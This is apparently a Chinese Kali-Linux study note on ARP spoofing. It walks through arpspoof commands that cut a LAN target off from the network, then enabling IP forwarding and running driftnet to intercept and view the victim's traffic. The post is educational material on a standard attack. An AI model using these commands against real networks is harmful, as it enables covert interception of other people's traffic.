茴香豆安全 - KALI学习笔记

茴香豆安全 - ARP断网攻击与流量劫持

2020-05-22  本文已影响0人  wycdavid

一、ARP断网攻击

其实断网不是目的,只是在ARP欺骗过程中如果设置不正确会导致目标断网
我们真正要做的是,是通过ARP欺骗来对目标进行流量劫持

  1. 使用的工具是 arpspoof ,如果kali中没有安装,先安装
apt-get install arpspoof
apt-get install dsniff ssldump
  1. 使用arpspoof,来攻击目标,前提是你和目标在同一个局域网,可以互相访问,你知道目标的IP地址,怎么扫描局域网中的IP地址这个以后再说
arpspoof -h
arpspoof -i eth0 -t 192.168.1.129 192.168.1.1

命令格式:arpspoof -i 网卡 -t 目标ip 局域网的网关
网卡:当前你的kali系统的网卡,可以通过ifconfig或者 ip a 查看,比如eth0,ifconfig命令渐渐被淘汰了
目标IP:192.168.1.129 (请自行替换)
网关:192.168.1.1 (请自行替换)

二、ARP流量劫持

目标机之所以会断网,我个人理解,是因为目标机发给网关的流量,被我们给截获了。
如果既要保证我们可以截获目标机的流量,同时也不影响他的上网,那么就只要设置转发就可以了

  1. 流量转发,执行下面的命令,
echo 1 > /proc/sys/net/ipv4/ip_forward

echo 是一个输出命令,上面的命令简单解释就是 把1 写入到 /proc/sys/net/ipv4/ 目录下 ip_forward 文件中,其实就是修改配置文件中的值,1转发,0不转发

  1. 查看所劫持流量中的图片
driftnet -i eth0
上一篇下一篇

猜你喜欢

热点阅读